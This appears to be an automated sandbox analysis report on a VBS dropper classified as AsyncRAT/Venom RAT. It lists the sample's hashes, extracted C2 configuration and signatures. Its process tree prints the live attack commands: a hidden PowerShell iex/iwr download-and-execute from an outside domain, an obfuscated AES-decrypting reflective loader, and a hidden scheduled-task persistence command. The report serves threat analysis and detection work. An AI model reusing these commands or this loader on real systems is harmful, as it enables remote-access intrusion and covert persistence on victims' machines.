Overview

overview

10

Static

static

1

9f0e70dc0d...e2.vbs

windows7-x64

8

9f0e70dc0d...e2.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/12/2024, 02:49 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs

  • Size

    79KB

  • MD5

    c0e2ce250c4979a59970d22fd99f340f

  • SHA1

    4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0

  • SHA256

    9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2

  • SHA512

    f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404

  • SSDEEP

    1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild

Score
10/10
asyncratomen core i9executionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

OMEN core i9

C2

45.88.88.7:4164

Mutex

qqkyuzisfolbtlf

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
YHR4dQfnx55tUzYOYRjoXwdjLgLXeKIa

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1188
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:376
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:3524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3536
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs"
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1444
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_306.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1164
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                  PID:3272
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:4976

      Network

      • flag-us
        DNS
        104.219.191.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        104.219.191.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        emptyservices.xyz
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        emptyservices.xyz
        IN A
        Response
      • flag-us
        DNS
        77.190.18.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        77.190.18.2.in-addr.arpa
        IN PTR
        Response
        77.190.18.2.in-addr.arpa
        IN PTR
        a2-18-190-77deploystaticakamaitechnologiescom
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        212.20.149.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        212.20.149.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        21.236.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        21.236.111.52.in-addr.arpa
        IN PTR
        Response
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         160 B
         5
        4
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        260 B
         200 B
         5
        5
      • 45.88.88.7:4164
        powershell.exe
        208 B
         160 B
         4
        4
      • 8.8.8.8:53
        104.219.191.52.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        104.219.191.52.in-addr.arpa

      • 8.8.8.8:53
        emptyservices.xyz
        dns
        powershell.exe
        63 B
         128 B
         1
        1

        DNS Request

        emptyservices.xyz

      • 8.8.8.8:53
        77.190.18.2.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        77.190.18.2.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
         144 B
         1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
         147 B
         1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        228.249.119.40.in-addr.arpa
        dns
        73 B
         159 B
         1
        1

        DNS Request

        228.249.119.40.in-addr.arpa

      • 8.8.8.8:53
        212.20.149.52.in-addr.arpa
        dns
        72 B
         146 B
         1
        1

        DNS Request

        212.20.149.52.in-addr.arpa

      • 8.8.8.8:53
        206.23.85.13.in-addr.arpa
        dns
        71 B
         145 B
         1
        1

        DNS Request

        206.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        21.236.111.52.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        21.236.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b66db53846de4860ca72a3e59b38c544

        SHA1

        2202dc88e9cddea92df4f4e8d83930efd98c9c5a

        SHA256

        b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

        SHA512

        72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1n11pi01.qk0.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\system.bat
        Filesize

        69KB

        MD5

        8078d12b395b01ad397cec896ae02a6a

        SHA1

        2a5b18660c4b2b40969651ca16a1ede64f3aecf5

        SHA256

        0c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7

        SHA512

        df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs
        Filesize

        115B

        MD5

        196f1476d832a6085e80730d7318bc04

        SHA1

        fff8676fdf96eb8655051b14c9e650880dc81945

        SHA256

        17a717c7781f2bc4c1738160eac02c1777517ec62838889e440cade2fa89d55c

        SHA512

        e6f79e4c96748089a73e7a8ae9e95e911cdc7f97fef9a12c88178f185fb8dc4c67dc800bd7eaa025c5bb48909f218ffee87dc8aedc29914af916bf1956e3b2a4

        Download Submit

      • memory/1188-12-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-17-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-14-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-13-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-0-0x00007FFE161D3000-0x00007FFE161D5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1188-11-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1188-1-0x000002C9E4350000-0x000002C9E4372000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4472-32-0x00000270EE9E0000-0x00000270EEA24000-memory.dmp

        Filesize

        272KB

        Download

      • memory/4472-33-0x00000270EECD0000-0x00000270EED46000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4472-34-0x00000270EE990000-0x00000270EE998000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4472-35-0x00000270EE9A0000-0x00000270EE9B2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4976-64-0x000001E3E72E0000-0x000001E3E72F8000-memory.dmp

        Filesize

        96KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.